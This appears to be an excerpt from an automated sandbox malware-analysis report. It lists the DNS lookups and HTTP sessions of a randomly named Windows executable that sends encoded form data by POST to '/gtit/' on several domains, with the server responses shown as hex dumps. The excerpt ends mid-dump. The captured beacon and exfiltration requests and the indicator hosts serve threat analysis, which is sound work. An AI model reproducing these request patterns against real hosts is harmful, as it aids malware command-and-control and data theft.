                                      May 4, 2024 10:10:16.525365114 CEST53611861.1.1.1192.168.2.8
                                      May 4, 2024 10:10:32.440303087 CEST6225053192.168.2.81.1.1.1
                                      May 4, 2024 10:10:33.274693012 CEST53622501.1.1.1192.168.2.8
                                      May 4, 2024 10:10:51.510672092 CEST5314753192.168.2.81.1.1.1
                                      May 4, 2024 10:10:51.897044897 CEST53531471.1.1.1192.168.2.8

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      May 4, 2024 10:10:16.348045111 CEST192.168.2.81.1.1.10x4321Standard query (0)www.ty8yd.usA (IP address)IN (0x0001)false
                                      May 4, 2024 10:10:32.440303087 CEST192.168.2.81.1.1.10x9f6fStandard query (0)www.tehranrizcomputer.comA (IP address)IN (0x0001)false
                                      May 4, 2024 10:10:51.510672092 CEST192.168.2.81.1.1.10xe313Standard query (0)www.coppercookwarekitchen.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      May 4, 2024 10:10:16.525365114 CEST1.1.1.1192.168.2.80x4321No error (0)www.ty8yd.us91.195.240.123A (IP address)IN (0x0001)false
                                      May 4, 2024 10:10:33.274693012 CEST1.1.1.1192.168.2.80x9f6fNo error (0)www.tehranrizcomputer.comtehranrizcomputer.comCNAME (Canonical name)IN (0x0001)false
                                      May 4, 2024 10:10:33.274693012 CEST1.1.1.1192.168.2.80x9f6fNo error (0)tehranrizcomputer.com87.107.55.55A (IP address)IN (0x0001)false
                                      May 4, 2024 10:10:51.897044897 CEST1.1.1.1192.168.2.80xe313No error (0)www.coppercookwarekitchen.com35.215.179.87A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • www.ty8yd.us
                                      • www.tehranrizcomputer.com
                                      • www.coppercookwarekitchen.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.84970991.195.240.123804540C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      TimestampBytes transferredDirectionData
                                      May 4, 2024 10:10:16.842545986 CEST520OUTGET /gtit/?h2hLp=lXUTv2j8Xvb&6t=7JoAjWU6fcQ7CNTtX/U31Su9rRPUkr/mRT6nto1Tw/3EsD0jLMtc/bvrMEH2PX3CJD1RySmx+2JNj33ZBcO0uuHomTTQmPBBQgDcEfgCf/hj3/XBz9l0dPBO2TTZTjDWug== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US
                                      Host: www.ty8yd.us
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                      May 4, 2024 10:10:17.150382042 CEST208INHTTP/1.1 403 Forbidden
                                      content-length: 93
                                      cache-control: no-cache
                                      content-type: text/html
                                      connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.84971087.107.55.55804540C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      TimestampBytes transferredDirectionData
                                      May 4, 2024 10:10:33.998564005 CEST806OUTPOST /gtit/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US
                                      Host: www.tehranrizcomputer.com
                                      Origin: http://www.tehranrizcomputer.com
                                      Content-Length: 203
                                      Connection: close
                                      Cache-Control: max-age=0
                                      Content-Type: application/x-www-form-urlencoded
                                      Referer: http://www.tehranrizcomputer.com/gtit/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                      Data Raw: 36 74 3d 42 69 33 6e 6c 4b 68 72 50 71 38 73 4c 46 31 65 2f 53 6f 77 2b 59 33 74 41 4d 37 79 45 35 72 71 73 70 5a 49 70 35 31 4c 41 59 31 51 7a 31 6b 6d 6f 69 69 56 46 55 73 42 68 6b 30 56 43 51 41 6d 34 56 52 43 44 73 61 73 4e 2b 45 66 63 70 61 55 66 35 6d 68 54 2f 63 75 50 51 44 78 6d 36 45 45 2b 54 46 48 58 4e 68 53 34 6b 45 6e 73 47 4a 59 50 34 51 45 70 4e 66 79 2f 56 59 64 4c 6c 6c 77 64 56 6a 2f 62 64 30 4d 75 67 76 36 73 6e 48 69 50 30 66 59 47 66 75 37 6b 72 71 4c 52 44 62 52 6a 67 38 63 72 41 2f 52 73 53 41 44 57 62 6e 31 33 63 54 74 6f 56 56 52 63 32 62 37 6e 33 4d 33 59 47 5a 58 35 62 63 3d
                                      Data Ascii: 6t=Bi3nlKhrPq8sLF1e/Sow+Y3tAM7yE5rqspZIp51LAY1Qz1kmoiiVFUsBhk0VCQAm4VRCDsasN+EfcpaUf5mhT/cuPQDxm6EE+TFHXNhS4kEnsGJYP4QEpNfy/VYdLllwdVj/bd0Mugv6snHiP0fYGfu7krqLRDbRjg8crA/RsSADWbn13cTtoVVRc2b7n3M3YGZX5bc=
                                      May 4, 2024 10:10:35.455874920 CEST1289INHTTP/1.1 404 Not Found
                                      Connection: close
                                      x-litespeed-tag: 3ec_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      content-type: text/html; charset=UTF-8
                                      link: <https://tehranrizcomputer.com/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      transfer-encoding: chunked
                                      content-encoding: br
                                      vary: Accept-Encoding
                                      date: Sat, 04 May 2024 08:10:35 GMT
                                      Data Raw: 35 65 64 63 0d 0a f4 ff 1b 66 23 ec 9e 95 da 7b a8 ca 80 39 69 f5 00 a8 ce c4 18 37 f4 c7 af 3f ff fe 2a 30 76 37 c4 3a ae e7 fb 7f b3 d4 fe d7 ac 73 bc d8 df 40 47 91 4a 2e 80 00 87 1a 28 97 12 79 48 e2 1e 1c b7 65 b7 bb db d2 e1 01 89 cb 22 24 92 60 00 b0 58 65 45 ef ff 39 59 78 b3 f7 1f a6 37 8d 9b b5 d4 d9 fd cb a6 d5 7b e7 f3 52 d9 1b ec da 96 a7 bb 91 84 60 76 ef ce 89 cb e1 47 90 19 86 20 0e e1 74 e1 af 74 d6 9f f1 e5 f4 d4 53 5e 26 35 52 4b 02 24 0f 68 e2 6e b6 bd 29 53 8d d4 80 66 94 be 24 8c bd 21 92 0e aa fb 3f 47 8d 99 a0 8f d9 10 7d 39 bf 06 b3 8f e5 e7 e9 aa 9a dd b0 dd 51 4b 1c a0 97 f0 ec 35 e8 aa f9 34 4b 64 87 fe 7f df b4 72 57 52 34 cd ee 96 37 b9 0f 6d da 4d 37 8e 23 e7 22 29 74 36 ba e6 05 ff 57 55 50 85 42 50 05 30 28 98 a0 40 30 a8 22 70 8e 40 a2 ef bb ef fd 5f bf 7e 15 d0 f0 03 82 a6 c1 b6 00 bb 77 17 04 c9 11 db 07 60 83 01 c7 d8 a6 bc 0b 75 72 92 e3 7b 64 38 32 ce 04 99 fb c0 3a b6 9c e5 66 0a 67 33 39 17 84 9b 06 32 2e 94 42 2d 63 66 d3 7e ff ae dd 4a 06 21 84 a1 12 f5 31 [TRUNCATED]
                                      Data Ascii: 5edcf#{9i7?*0v7:s@GJ.(yHe"$`XeE9Yx7{R`vG ttS^&5RK$hn)Sf$!?G}9QK54KdrWR47mM7#")t6WUPBP0(@0"p@_~w`ur{d82:fg392.B-cf~J!1fM@ico~p "<Q/QAYkUA<ZNP1SiV|se-C&cec:(MY13Mf6X,\wXl0c7B!6M!3X[Y4m?x%M&A<qcUx-A_2b(\xh#)B'Jk6pF!5=Z)svgI80.;(k#&<;GLu?Q*G(b(.xcUo0v.thBlbA{O3<@QS?<t+/??/}qA~*|C
                                      May 4, 2024 10:10:35.455990076 CEST1289INData Raw: 20 04 01 0e e5 2d 33 bc fa 11 76 e6 e2 96 50 20 25 bc 80 df f7 b8 26 e6 62 7c a3 1e 5f 3b d3 59 10 48 b2 49 d4 95 35 b6 92 3a 4c a8 93 b3 5b f2 b5 ac 46 77 9e 64 24 6d 31 d8 71 cc d8 0d 99 91 af 43 df f9 ec c3 2d f9 da ef 7b 24 19 79 8f c5 85 f6
                                      Data Ascii: -3vP %&b|_;YHI5:L[Fwd$m1qC-{$yHfk`=a`FfdHp;(}?g_~tp>|'_>=Wx/Sq'2#t^ba&fKAO@WyymteoG}^?I
                                      May 4, 2024 10:10:35.456002951 CEST1289INData Raw: 97 df cb 31 35 a5 ac a7 3c 84 ac 50 44 d6 9a 99 c4 8f 45 8a 12 7c 71 c4 aa 54 eb 9b 6a a8 9c f9 67 b7 71 10 01 71 92 a4 2f 8d 42 20 32 c0 3a 05 4d 55 65 96 94 67 4e 75 09 53 41 d1 78 0b f8 09 dc bb aa 39 f7 a9 60 9c e4 19 62 3f e9 54 44 06 5d fe
                                      Data Ascii: 15<PDE|qTjgqq/B 2:MUegNuSAx9`b?TD]vy4O,)S&/:T?WnKm0gi6AU9<Ko?kxFh*@Dc?WfP4&J2$3J>j1=.1FV
                                      May 4, 2024 10:10:35.456017017 CEST1289INData Raw: 19 1c 81 f0 6c f2 a4 61 c2 2b bd 30 c6 3b 6f 65 2f 39 6a 39 99 e1 d2 b9 10 a8 66 e3 fb c3 c9 59 e2 19 59 5c 16 87 f4 71 59 20 f8 c5 f6 d2 7a 17 16 d2 59 25 b7 92 6a 5e 18 a4 6c dc 02 0a 12 a5 3a 23 9c bd e6 b5 cb 4b d3 f6 c6 a1 cd 87 21 b1 52 cb
                                      Data Ascii: la+0;oe/9j9fYY\qY zY%j^l:#K!R)x4&HK_mI+X/77P+8.~KYD*BaYJT(M56l%H *O1a9R]GFfQ&Cd:Iycn1CDB=YC!s~ (
                                      May 4, 2024 10:10:35.456031084 CEST1289INData Raw: ff 57 97 4b a5 48 46 3a 43 ee 4e 27 e1 09 5c 5d 9d c1 49 38 91 3a 50 fc af c6 4e 85 b1 6c 09 9b 94 31 5d 14 5a be cf 4c 02 02 db b6 e6 1b 8d e1 b5 63 75 4a b2 f9 21 0a 96 70 6f 18 a2 21 ac d0 06 a3 d5 e1 03 c6 09 ce 47 4b 3c 22 92 32 fa d9 25 84
                                      Data Ascii: WKHF:CN'\]I8:PNl1]ZLcuJ!po!GK<"2%Nko/cqRri[J0@teYn$SyXB+u=6XzK<cOjM7wnIN^k[t~G%s4k:X4`9YF~>
                                      May 4, 2024 10:10:35.456042051 CEST1289INData Raw: 5a 68 0d 71 ee 4c bb 2b bb ab c7 86 a7 67 7c 1c 45 c8 26 2f 54 40 06 c7 fd 48 8f 97 0f 4f 21 04 68 b6 3b 9c 4d 59 89 5e 63 77 05 27 d0 4e e1 31 58 c8 5e 78 2c 40 b6 55 c4 d5 65 d9 4a 0b d8 94 32 24 19 d0 d2 09 cd 17 eb 75 37 34 4d 06 39 4f 33 05
                                      Data Ascii: ZhqL+g|E&/T@HO!h;MY^cw'N1X^x,@UeJ2$u74M9O3lN4G;~Lh$F+EkT;@\.ML1c`Kq#7MVU.VqV'"?#+xrRQo4t-j[Ty$RG
                                      May 4, 2024 10:10:35.456051111 CEST1289INData Raw: c2 d6 2d 93 e8 11 ab 16 60 78 d7 68 2e b0 0a 3e b4 13 ad e0 df 34 8a a8 61 e8 64 18 82 4d 98 c2 ed 64 12 04 1f 3a c1 66 6e 4b a6 82 2b de cd c2 b1 ce 5b f4 65 6d 13 c3 ab e6 73 2e f0 f1 47 6e 1e a0 9b e5 11 c7 82 f3 ed 08 94 4a 35 84 a8 13 95 01
                                      Data Ascii: -`xh.>4adMd:fnK+[ems.GnJ5C;<uEn+RLj$(-Q<=y3U.jJ)]a[<1#NypI0j(qrLbyA'!|>c
                                      May 4, 2024 10:10:35.456063986 CEST1289INData Raw: cc e0 e8 28 20 4b b9 3e 0a 8f 26 00 08 08 22 27 58 23 06 8a c6 6c 96 89 1c 68 8c e9 99 b0 08 6c 63 55 b7 1b 54 41 54 2c d1 61 19 80 0f c0 8a c7 62 4a d6 55 ba dd b0 8b e1 b1 66 c5 0d 72 1f c5 7a 27 75 c3 a6 9a 77 ef 36 fc 1c d5 90 10 a6 bb 41 07
                                      Data Ascii: ( K>&"'X#lhlcUTAT,abJUfrz'uw6Aj{g|_1$mIgLqn2)+1(zU!bM8rsvt!a4O0~*GXx`Ehk,X%MM]UPOF.5M/Wr%F8=y
                                      May 4, 2024 10:10:35.456077099 CEST1289INData Raw: 73 33 69 b3 f1 2d 70 37 0c a2 ab 5c 52 31 cb 44 1a b1 5f 2c 2d 30 0f b9 99 5f f0 b2 6f 47 62 57 3b d5 20 97 85 27 20 e9 49 ef f5 49 90 8e 76 4b 28 8f a5 69 97 f3 c3 48 26 fb de b9 55 d1 7f 91 4b ec 68 8b 5e d2 a7 b2 d6 a7 d1 f5 4b fa 36 22 ad ef
                                      Data Ascii: s3i-p7\R1D_,-0_oGbW; ' IIvK(iH&UKh^K6"D!QPNm6NNEDqr8uc{N&B2;.a{{nk!(=$\,`X=?=4zD!ZEB_ARQ'I$Uf@V<c
                                      May 4, 2024 10:10:35.456089973 CEST1289INData Raw: 63 8e 5f 2b 2b 3d f6 12 1a ec f4 9e 7a 5b e2 1e 64 b5 99 d7 ef 37 ac b3 27 de 4b 83 29 ae 3b 56 a3 96 a9 d1 33 24 7b 27 f5 95 cd 70 f9 45 39 f6 f0 93 58 36 9e 8d 25 ad 8c 1d 07 8a 6e 22 97 bb 34 43 6f ba 7c 3c b5 1d a1 67 42 75 97 b1 bc 4c 23 0c
                                      Data Ascii: c_++=z[d7'K);V3${'pE9X6%n"4Co|<gBuL#[]2i?9q=JoknqDjZT4`WYjeKSIbo#S7p|\2Rx>zYu\>9I!>jN+5zEKLJI4
                                      May 4, 2024 10:10:35.846956968 CEST1289INData Raw: 9d 3f 5f 07 ad e9 cf a8 32 de c1 ff 72 6c d6 78 0b fb a6 3e 49 df e2 ed 1a 9c 0c 55 ea f9 32 b1 89 d5 2b bc f6 d3 cc 4d 79 9c 65 82 54 16 c4 5c 3a 06 be 3d 30 15 07 24 09 4d b3 f5 cc 9b 3e af a2 8e 4e 16 2b 3b 90 a9 c5 e4 62 4e 73 3f 6a 3a 83 7b
                                      Data Ascii: ?_2rlx>IU2+MyeT\:=0$M>N+;bNs?j:{Eq5J;w<*/U7JHpH7B\a0RINw]#>|LK90rU+ujI97-.h\gT,4l|\%oFM7Trd-VK


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.84971187.107.55.55804540C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      TimestampBytes transferredDirectionData
                                      May 4, 2024 10:10:38.910871983 CEST826OUTPOST /gtit/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US
                                      Host: www.tehranrizcomputer.com
                                      Origin: http://www.tehranrizcomputer.com
                                      Content-Length: 223
                                      Connection: close
                                      Cache-Control: max-age=0
                                      Content-Type: application/x-www-form-urlencoded
                                      Referer: http://www.tehranrizcomputer.com/gtit/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                      Data Raw: 36 74 3d 42 69 33 6e 6c 4b 68 72 50 71 38 73 45 45 46 65 38 79 55 77 76 6f 33 75 65 63 37 79 4e 5a 72 75 73 70 64 49 70 34 78 39 41 71 52 51 7a 52 6f 6d 70 67 4b 56 49 30 73 42 70 45 30 51 47 51 41 39 34 56 74 4b 44 6f 61 73 4e 2b 51 66 63 74 65 55 66 71 65 6d 63 50 63 6f 55 67 44 67 70 61 45 45 2b 54 46 48 58 4e 31 73 34 6b 4d 6e 73 58 5a 59 4f 62 49 62 67 74 66 31 32 31 59 64 63 31 6c 30 64 56 6a 64 62 59 63 71 75 69 6e 36 73 6d 33 69 4d 6c 66 48 50 66 75 35 70 4c 72 6c 48 42 48 59 37 52 6c 34 76 54 48 45 72 53 45 65 61 4e 4b 66 74 2b 62 72 72 56 39 36 63 31 7a 4e 69 41 52 66 43 6c 4a 6e 6e 4d 4b 44 44 59 6d 59 53 64 73 49 4d 6a 31 65 70 6a 47 46 62 44 36 64
                                      Data Ascii: 6t=Bi3nlKhrPq8sEEFe8yUwvo3uec7yNZruspdIp4x9AqRQzRompgKVI0sBpE0QGQA94VtKDoasN+QfcteUfqemcPcoUgDgpaEE+TFHXN1s4kMnsXZYObIbgtf121Ydc1l0dVjdbYcquin6sm3iMlfHPfu5pLrlHBHY7Rl4vTHErSEeaNKft+brrV96c1zNiARfClJnnMKDDYmYSdsIMj1epjGFbD6d
                                      May 4, 2024 10:10:40.284658909 CEST1289INHTTP/1.1 404 Not Found
                                      Connection: close
                                      x-litespeed-tag: 3ec_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      content-type: text/html; charset=UTF-8
                                      link: <https://tehranrizcomputer.com/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      transfer-encoding: chunked
                                      content-encoding: br
                                      vary: Accept-Encoding
                                      date: Sat, 04 May 2024 08:10:40 GMT
                                      Data Raw: 35 65 64 63 0d 0a f4 ff 1b 66 23 ec 9e 95 da 7b a8 ca 80 39 69 f5 00 a8 ce c4 18 37 f4 c7 af 3f ff fe 2a 30 76 37 c4 3a ae e7 fb 7f b3 d4 fe d7 ac 73 bc d8 df 40 47 91 4a 2e 80 00 87 1a 28 97 12 79 48 e2 1e 1c b7 65 b7 bb db d2 e1 01 89 cb 22 24 92 60 00 b0 58 65 45 ef ff 39 59 78 b3 f7 1f a6 37 8d 9b b5 d4 d9 fd cb a6 d5 7b e7 f3 52 d9 1b ec da 96 a7 bb 91 84 60 76 ef ce 89 cb e1 47 90 19 86 20 0e e1 74 e1 af 74 d6 9f f1 e5 f4 d4 53 5e 26 35 52 4b 02 24 0f 68 e2 6e b6 bd 29 53 8d d4 80 66 94 be 24 8c bd 21 92 0e aa fb 3f 47 8d 99 a0 8f d9 10 7d 39 bf 06 b3 8f e5 e7 e9 aa 9a dd b0 dd 51 4b 1c a0 97 f0 ec 35 e8 aa f9 34 4b 64 87 fe 7f df b4 72 57 52 34 cd ee 96 37 b9 0f 6d da 4d 37 8e 23 e7 22 29 74 36 ba e6 05 ff 57 55 50 85 42 50 05 30 28 98 a0 40 30 a8 22 70 8e 40 a2 ef bb ef fd 5f bf 7e 15 d0 f0 03 82 a6 c1 b6 00 bb 77 17 04 c9 11 db 07 60 83 01 c7 d8 a6 bc 0b 75 72 92 e3 7b 64 38 32 ce 04 99 fb c0 3a b6 9c e5 66 0a 67 33 39 17 84 9b 06 32 2e 94 42 2d 63 66 d3 7e ff ae dd 4a 06 21 84 a1 12 f5 31 [TRUNCATED]
                                      Data Ascii: 5edcf#{9i7?*0v7:s@GJ.(yHe"$`XeE9Yx7{R`vG ttS^&5RK$hn)Sf$!?G}9QK54KdrWR47mM7#")t6WUPBP0(@0"p@_~w`ur{d82:fg392.B-cf~J!1fM@ico~p "<Q/QAYkUA<ZNP1SiV|se-C&cec:(MY13Mf6X,\wXl0c7B!6M!3X[Y4m?x%M&A<qcUx-A_2b(\xh#)B'Jk6pF!5=Z)svgI80.;(k#&<;GLu?Q*G(b(.xcUo0v.thBlbA{O3<@QS?<t+/??/}qA~*|C
                                      May 4, 2024 10:10:40.284681082 CEST1289INData Raw: 20 04 01 0e e5 2d 33 bc fa 11 76 e6 e2 96 50 20 25 bc 80 df f7 b8 26 e6 62 7c a3 1e 5f 3b d3 59 10 48 b2 49 d4 95 35 b6 92 3a 4c a8 93 b3 5b f2 b5 ac 46 77 9e 64 24 6d 31 d8 71 cc d8 0d 99 91 af 43 df f9 ec c3 2d f9 da ef 7b 24 19 79 8f c5 85 f6
                                      Data Ascii: -3vP %&b|_;YHI5:L[Fwd$m1qC-{$yHfk`=a`FfdHp;(}?g_~tp>|'_>=Wx/Sq'2#t^ba&fKAO@WyymteoG}^?I
                                      May 4, 2024 10:10:40.284693003 CEST1289INData Raw: 97 df cb 31 35 a5 ac a7 3c 84 ac 50 44 d6 9a 99 c4 8f 45 8a 12 7c 71 c4 aa 54 eb 9b 6a a8 9c f9 67 b7 71 10 01 71 92 a4 2f 8d 42 20 32 c0 3a 05 4d 55 65 96 94 67 4e 75 09 53 41 d1 78 0b f8 09 dc bb aa 39 f7 a9 60 9c e4 19 62 3f e9 54 44 06 5d fe
                                      Data Ascii: 15<PDE|qTjgqq/B 2:MUegNuSAx9`b?TD]vy4O,)S&/:T?WnKm0gi6AU9<Ko?kxFh*@Dc?WfP4&J2$3J>j1=.1FV
                                      May 4, 2024 10:10:40.284706116 CEST1289INData Raw: 19 1c 81 f0 6c f2 a4 61 c2 2b bd 30 c6 3b 6f 65 2f 39 6a 39 99 e1 d2 b9 10 a8 66 e3 fb c3 c9 59 e2 19 59 5c 16 87 f4 71 59 20 f8 c5 f6 d2 7a 17 16 d2 59 25 b7 92 6a 5e 18 a4 6c dc 02 0a 12 a5 3a 23 9c bd e6 b5 cb 4b d3 f6 c6 a1 cd 87 21 b1 52 cb
                                      Data Ascii: la+0;oe/9j9fYY\qY zY%j^l:#K!R)x4&HK_mI+X/77P+8.~KYD*BaYJT(M56l%H *O1a9R]GFfQ&Cd:Iycn1CDB=YC!s~ (
                                      May 4, 2024 10:10:40.284719944 CEST1289INData Raw: ff 57 97 4b a5 48 46 3a 43 ee 4e 27 e1 09 5c 5d 9d c1 49 38 91 3a 50 fc af c6 4e 85 b1 6c 09 9b 94 31 5d 14 5a be cf 4c 02 02 db b6 e6 1b 8d e1 b5 63 75 4a b2 f9 21 0a 96 70 6f 18 a2 21 ac d0 06 a3 d5 e1 03 c6 09 ce 47 4b 3c 22 92 32 fa d9 25 84
                                      Data Ascii: WKHF:CN'\]I8:PNl1]ZLcuJ!po!GK<"2%Nko/cqRri[J0@teYn$SyXB+u=6XzK<cOjM7wnIN^k[t~G%s4k:X4`9YF~>
                                      May 4, 2024 10:10:40.284733057 CEST1289INData Raw: 5a 68 0d 71 ee 4c bb 2b bb ab c7 86 a7 67 7c 1c 45 c8 26 2f 54 40 06 c7 fd 48 8f 97 0f 4f 21 04 68 b6 3b 9c 4d 59 89 5e 63 77 05 27 d0 4e e1 31 58 c8 5e 78 2c 40 b6 55 c4 d5 65 d9 4a 0b d8 94 32 24 19 d0 d2 09 cd 17 eb 75 37 34 4d 06 39 4f 33 05
                                      Data Ascii: ZhqL+g|E&/T@HO!h;MY^cw'N1X^x,@UeJ2$u74M9O3lN4G;~Lh$F+EkT;@\.ML1c`Kq#7MVU.VqV'"?#+xrRQo4t-j[Ty$RG
                                      May 4, 2024 10:10:40.284756899 CEST1289INData Raw: c2 d6 2d 93 e8 11 ab 16 60 78 d7 68 2e b0 0a 3e b4 13 ad e0 df 34 8a a8 61 e8 64 18 82 4d 98 c2 ed 64 12 04 1f 3a c1 66 6e 4b a6 82 2b de cd c2 b1 ce 5b f4 65 6d 13 c3 ab e6 73 2e f0 f1 47 6e 1e a0 9b e5 11 c7 82 f3 ed 08 94 4a 35 84 a8 13 95 01
                                      Data Ascii: -`xh.>4adMd:fnK+[ems.GnJ5C;<uEn+RLj$(-Q<=y3U.jJ)]a[<1#NypI0j(qrLbyA'!|>c
                                      May 4, 2024 10:10:40.284770966 CEST1289INData Raw: cc e0 e8 28 20 4b b9 3e 0a 8f 26 00 08 08 22 27 58 23 06 8a c6 6c 96 89 1c 68 8c e9 99 b0 08 6c 63 55 b7 1b 54 41 54 2c d1 61 19 80 0f c0 8a c7 62 4a d6 55 ba dd b0 8b e1 b1 66 c5 0d 72 1f c5 7a 27 75 c3 a6 9a 77 ef 36 fc 1c d5 90 10 a6 bb 41 07
                                      Data Ascii: ( K>&"'X#lhlcUTAT,abJUfrz'uw6Aj{g|_1$mIgLqn2)+1(zU!bM8rsvt!a4O0~*GXx`Ehk,X%MM]UPOF.5M/Wr%F8=y
                                      May 4, 2024 10:10:40.284784079 CEST1289INData Raw: 73 33 69 b3 f1 2d 70 37 0c a2 ab 5c 52 31 cb 44 1a b1 5f 2c 2d 30 0f b9 99 5f f0 b2 6f 47 62 57 3b d5 20 97 85 27 20 e9 49 ef f5 49 90 8e 76 4b 28 8f a5 69 97 f3 c3 48 26 fb de b9 55 d1 7f 91 4b ec 68 8b 5e d2 a7 b2 d6 a7 d1 f5 4b fa 36 22 ad ef
                                      Data Ascii: s3i-p7\R1D_,-0_oGbW; ' IIvK(iH&UKh^K6"D!QPNm6NNEDqr8uc{N&B2;.a{{nk!(=$\,`X=?=4zD!ZEB_ARQ'I$Uf@V<c
                                      May 4, 2024 10:10:40.284800053 CEST1289INData Raw: 63 8e 5f 2b 2b 3d f6 12 1a ec f4 9e 7a 5b e2 1e 64 b5 99 d7 ef 37 ac b3 27 de 4b 83 29 ae 3b 56 a3 96 a9 d1 33 24 7b 27 f5 95 cd 70 f9 45 39 f6 f0 93 58 36 9e 8d 25 ad 8c 1d 07 8a 6e 22 97 bb 34 43 6f ba 7c 3c b5 1d a1 67 42 75 97 b1 bc 4c 23 0c
                                      Data Ascii: c_++=z[d7'K);V3${'pE9X6%n"4Co|<gBuL#[]2i?9q=JoknqDjZT4`WYjeKSIbo#S7p|\2Rx>zYu\>9I!>jN+5zEKLJI4
                                      May 4, 2024 10:10:40.663069010 CEST1289INData Raw: 9d 3f 5f 07 ad e9 cf a8 32 de c1 ff 72 6c d6 78 0b fb a6 3e 49 df e2 ed 1a 9c 0c 55 ea f9 32 b1 89 d5 2b bc f6 d3 cc 4d 79 9c 65 82 54 16 c4 5c 3a 06 be 3d 30 15 07 24 09 4d b3 f5 cc 9b 3e af a2 8e 4e 16 2b 3b 90 a9 c5 e4 62 4e 73 3f 6a 3a 83 7b
                                      Data Ascii: ?_2rlx>IU2+MyeT\:=0$M>N+;bNs?j:{Eq5J;w<*/U7JHpH7B\a0RINw]#>|LK90rU+ujI97-.h\gT,4l|\%oFM7Trd-VK


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.84971287.107.55.55804540C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe
                                      TimestampBytes transferredDirectionData
                                      May 4, 2024 10:10:41.830506086 CEST1843OUTPOST /gtit/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US
                                      Host: www.tehranrizcomputer.com
                                      Origin: http://www.tehranrizcomputer.com
                                      Content-Length: 1239
                                      Connection: close
                                      Cache-Control: max-age=0
                                      Content-Type: application/x-www-form-urlencoded
                                      Referer: http://www.tehranrizcomputer.com/gtit/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                      Data Raw: 36 74 3d 42 69 33 6e 6c 4b 68 72 50 71 38 73 45 45 46 65 38 79 55 77 76 6f 33 75 65 63 37 79 4e 5a 72 75 73 70 64 49 70 34 78 39 41 71 5a 51 7a 43 67 6d 6f 48 2b 56 4a 30 73 42 6e 6b 30 52 47 51 42 2f 34 56 46 30 44 6f 65 53 4e 34 63 66 63 49 4b 55 4f 72 65 6d 4c 66 63 6f 4c 51 44 77 6d 36 45 72 2b 54 31 44 58 4e 6c 73 34 6b 4d 6e 73 55 52 59 4a 49 51 62 69 74 66 79 2f 56 59 4a 4c 6c 6c 4d 64 56 37 6e 62 59 59 63 74 57 72 36 74 47 6e 69 66 6e 33 48 58 50 75 33 6c 72 72 4c 48 42 4b 41 37 51 49 42 76 53 7a 75 72 51 45 65 5a 70 44 79 39 64 66 30 77 55 30 46 51 58 75 71 37 33 68 6c 64 33 78 4d 6b 4f 75 48 55 39 71 6a 52 63 45 48 4c 43 59 47 2b 6c 71 77 64 48 43 56 49 4d 2b 6e 32 76 55 75 43 72 32 2f 41 68 56 61 69 6d 4c 69 4a 77 58 71 7a 76 33 53 55 6a 46 75 38 7a 72 73 39 32 69 6e 63 5a 5a 74 36 51 61 42 7a 46 37 47 58 63 4e 32 34 7a 79 2f 37 6b 6d 57 55 4c 70 39 75 4b 68 6b 62 4e 58 31 72 7a 4d 6d 69 